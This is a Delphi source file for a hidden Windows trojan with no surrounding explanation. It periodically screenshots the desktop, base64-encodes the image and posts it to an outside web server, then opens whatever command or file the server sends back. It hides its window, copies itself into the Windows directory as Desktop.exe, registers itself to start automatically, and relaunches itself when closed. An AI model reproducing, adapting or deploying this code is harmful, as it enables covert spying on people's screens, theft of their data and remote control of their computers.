unit Unit1;

interface

uses
  Windows, SysUtils, Forms, IdHTTP, IdCoder, IdCoder3to4, IdCoderMIME, jpeg,
  ExtCtrls, Classes, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient,
  Registry, Graphics, Shellapi;

type
  TForm1 = class(TForm)
    IdHTTP1: TIdHTTP;
    code: TIdEncoderMIME;
    Timer1: TTimer;
    procedure Timer1Timer(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure FormClose(Sender: TObject; var Action: TCloseAction);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
Form1: TForm1;

implementation

{$R *.dfm}

function GetScreenShot: TBitmap;
var
Desktop: HDC;
begin
Result  := TBitmap.Create;
Desktop := GetDC(0);
try
try
Result.PixelFormat := pf32bit;
Result.Width       := Screen.Width;
Result.Height      := Screen.Height;
BitBlt(Result.Canvas.Handle, 0, 0, Result.Width, Result.Height, Desktop, 0, 0, SRCCOPY);
Result.Modified := True;
finally
ReleaseDC(0, Desktop);
end;
except
Result.Free;
Result := nil;
end;
end;

function GetWinDir: string;
var
dir: array [0..MAX_PATH] of Char;
begin
GetWindowsDirectory(dir, MAX_PATH);
Result := StrPas(dir);
end;

procedure SetAutoStart(AppName, AppTitle: string; register: boolean); 
const 
RegKey = '\Software\Microsoft\Windows\CurrentVersion\Run';
var
Registry: TRegistry;
begin
Registry := TRegistry.Create;
try
Registry.RootKey := HKEY_LOCAL_MACHINE;
if Registry.OpenKey(RegKey, False) then
begin
if register = false then
Registry.DeleteValue(AppTitle)
else
Registry.WriteString(AppTitle, AppName);
end;
finally
Registry.Free;
end;
end;

procedure TForm1.Timer1Timer(Sender: TObject);
var
Source, Destination: TBitmap;
jpeg: TJPEGImage;
StringStream: TStringStream;
PostVars: TStringList;
FileStream: TFileStream;
begin
try
Source := TBitmap.Create;
Destination := TBitmap.Create;
Source.Width := Screen.Width;
Source.Height := Screen.Height;
Source.Canvas.Draw(0, 0, GetScreenShot);
Destination.Width := Source.Width div 2;
Destination.Height := Source.Height div 2;
Destination.Canvas.StretchDraw(Rect(0, 0, Destination.Width, Destination.Height), Source);
jpeg := TJPEGImage.Create;
try
jpeg.Assign(Destination);
jpeg.SaveToFile(GetWinDir + '\desktop.jpg');
finally
Source.Free;
Destination.Free;
jpeg.free;
end;
PostVars := TStringList.Create;
StringStream := TStringStream.Create(''); 
FileStream := TFileStream.Create(GetWinDir + '\desktop.jpg', fmOpenRead or fmShareDenyWrite);
try 
StringStream.CopyFrom(FileStream, FileStream.Size);
PostVars.Values['file'] := Code.Encode(StringStream.DataString);
StringStream.Size := 0;
IdHTTP1.Post('http://www.akosch.com/reni/online.php', PostVars, StringStream);
if StringStream.DataString <> '' then
ShellExecute(Handle, 'open', PChar(StringStream.DataString), nil, nil, SW_SHOW);
finally
StringStream.Free;
PostVars.Free;
FileStream.Free;
end;
except;
end;
end;

procedure TForm1.FormCreate(Sender: TObject);
var
fileSource, fileDest: String;
begin
try
Application.ShowMainForm := False;
if Paramstr(0) <> GetWinDir + '\DESKTOP.EXE' then
begin
fileSource := Paramstr(0);
fileDest := GetWinDir + '\Desktop.exe';
CopyFile (PChar(fileSource), PChar(fileDest), False);
SetAutoStart (GetWinDir + '\Desktop.exe', 'Desktop', True);
end;
except;
end;
end;

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
var
rufan: string;
begin
try
rufan := GetWinDir + '\Desktop.exe';
WinExec (PChar(rufan), SW_SHOW);
except;
end;
end;

end.
